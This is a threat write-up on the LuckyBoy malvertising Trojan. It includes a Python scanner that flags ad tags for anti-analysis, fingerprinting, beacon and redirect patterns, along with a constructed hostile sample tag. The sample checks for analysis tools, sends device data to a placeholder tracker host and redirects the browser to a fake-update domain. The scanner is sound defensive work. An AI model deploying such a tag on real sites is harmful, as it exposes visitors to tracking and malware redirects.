LuckyBoy Malware Description
The LuckyBoy Malware is a Trojan that redirects the user's browser to corrupted sites, such as fake update domains, and sends attackers information that can help them compromise the device. The LuckyBoy Malware targets victims through malvertising (or 'corrupted advertising') content for mobile and gaming environments such as Android, iOS and Xbox. Owners of at-risk devices can protect them with up-to-date, credible security solutions that are prepared to remove the LuckyBoy Malware, and should watch their Web browsing for symptoms such as unexpected website redirects.
Unlucky Gamers and Phone Owners in this Trojan's Campaign
Although most Trojans that malware researchers encounter favor Windows, there are exceptions to the rule, such as the WireLurker Trojan downloader, the inaccurately named FakeSpy, and the newest case in question: the LuckyBoy Malware. Named for its extensive anti-detection tracking features, the LuckyBoy Malware is a heavily concealed Trojan that targets Xbox users, Apple's iOS devices such as iPhones, and the Android mobile operating system.
The LuckyBoy Malware's campaign appears to be 'testing the waters' with initial forays of semi-limited distribution, which use advertising-tag-based content to infect users of the above operating systems. The LuckyBoy Malware's design emphasizes avoidance of detection, both automated and user-based, and its drive-by-download attacks can bypass ad security protocols meant to block Trojans. Although the DSP (demand-side platform) ad servers are European, affected users tend to be Canadian or American.
The LuckyBoy Malware serves as a high-end browser hijacker that uses a Web beacon in a 1x1 tracking pixel format for redirecting users to corrupted sites. Examples of possible redirects include taking users away from a legitimate update page to a fake one that downloads another Trojan or from a bank login site to a fake login that collects the user's credentials.
Further campaign waves are likely to broaden the LuckyBoy Malware's 'outreach' to victims by expanding the compromised ad tags.
Making One's Luck against a Bad Boy
The LuckyBoy Malware takes its name from the global variable-based tracking feature it uses, which continuously checks the device for virtual environments, debugging tools, and similar telltale signs of an analysis environment. It never executes in such an environment and can even stop its script after running for a time. This feature is one of several elements showing that the threat actor behind the LuckyBoy Malware, whoever they are, has non-negligible programming experience and a vested interest in evading detection.
Website redirects aren't the only danger in the LuckyBoy Malware's payload. Although malware analysts have yet to find any in-depth backdoor features, it transfers some system information to the attackers' servers, such as country codes, touch interface availability, and CPU core counts. Generalized reconnaissance of this type often precedes additional attacks that drop other threats onto the system or take over the device completely.
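The three behaviours described above (the 1x1 beacon that redirects the browser, the continuous anti-analysis checks, and the collection of country code, touch support and CPU core count) are what make the ad tag suspicious in combination, since a lone tracking pixel or a lone locale lookup is ordinary ad-tech. The following scanner, an added example written for this page and not code from the write-up or from the malware itself, scores ad-tag markup on those four indicator classes. The browser APIs it matches on (navigator.webdriver, navigator.hardwareConcurrency, navigator.maxTouchPoints, navigator.language) are my assumption about how such data is typically gathered in JavaScript; the page does not reproduce LuckyBoy's code, and the two sample tags are constructed for illustration.

```python
import re

# Indicator classes taken from the write-up. The regexes are my own guesses at
# how such behaviour commonly appears in ad-tag JavaScript (assumption), not
# LuckyBoy's actual code, which the page does not reproduce.
INDICATORS = {
    "anti_analysis": [
        re.compile(r"navigator\.webdriver"),                 # automation/analysis browser
        re.compile(r"\bdebugger\b"),                         # debugger-detection trick
        re.compile(r"callPhantom|_phantom|__nightmare|__selenium"),  # headless frameworks
    ],
    "fingerprint": [
        re.compile(r"navigator\.hardwareConcurrency"),       # CPU core count
        re.compile(r"navigator\.maxTouchPoints|ontouchstart"),  # touch interface availability
        re.compile(r"navigator\.language|resolvedOptions\(\)\.timeZone"),  # country/locale hint
    ],
    "beacon": [
        # 1x1 tracking pixel in markup; lookahead stops 10x10 etc. from matching
        re.compile(r"width\s*=\s*['\"]?1['\"]?(?=[\s>/])[^>]*height\s*=\s*['\"]?1['\"]?(?=[\s>/])", re.I),
        re.compile(r"new\s+Image\("),                        # script-created beacon
    ],
    "redirect": [
        # assignment to location (not a comparison), or replace()/assign()
        re.compile(r"location(?:\.href)?\s*=(?!=)|location\.(?:replace|assign)\("),
    ],
}


def scan_ad_tag(script: str) -> dict:
    """Return {indicator_class: [matched pattern strings]} for the classes that hit."""
    hits = {}
    for cls, patterns in INDICATORS.items():
        matched = [p.pattern for p in patterns if p.search(script)]
        if matched:
            hits[cls] = matched
    return hits


def is_suspicious(hits: dict) -> bool:
    """Flag the combination the write-up describes: a redirect plus at least two of
    the other three classes (beacon, fingerprinting, anti-analysis)."""
    return "redirect" in hits and len(hits) >= 3


# Constructed sample 1: an ordinary analytics pixel that also reads the locale.
BENIGN_TAG = """
<img src="https://ads.example/pixel.gif?cb=123" width="1" height="1" alt="">
<script>var lang = navigator.language;</script>
"""

# Constructed sample 2: bails out under analysis, fingerprints the device, beacons
# the result and then sends the browser to a placeholder "update" domain.
SUSPICIOUS_TAG = """
<script>
if (navigator.webdriver || window.callPhantom) { throw 0; }
var d = {cc: navigator.language, t: navigator.maxTouchPoints, c: navigator.hardwareConcurrency};
var b = new Image(); b.src = "https://tracker.example/p.gif?q=" + btoa(JSON.stringify(d));
setTimeout(function () { window.location.href = "https://fake-update.invalid/get"; }, 500);
</script>
"""


if __name__ == "__main__":
    for name, tag in (("benign", BENIGN_TAG), ("suspicious", SUSPICIOUS_TAG)):
        h = scan_ad_tag(tag)
        print(f"{name}: classes={sorted(h)} suspicious={is_suspicious(h)}")
```

Run over a feed of ad-tag creatives, the scanner is a triage filter rather than a verdict: tags that hit all four classes deserve a sandbox run, and the anti-analysis patterns are worth reviewing on their own because legitimate creatives rarely need to know whether they are being debugged.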
Android, iOS, and Xbox users should pay attention to advertising content and use ad-blocking features when necessary for their safety. Malware experts also recommend that users immediately update their respective anti-malware services for optimal detection rates and remove the LuckyBoy Malware as soon as possible.
In almost no time, the LuckyBoy Malware has made itself known as a powerhouse of Trojan engineering, preying on users of specialized and, often, casual Web-browsing environments. Assuming that one's phone is less endangered by Trojans than the average PC may end up hurting users badly in 2021, depending on how this threat's campaign develops.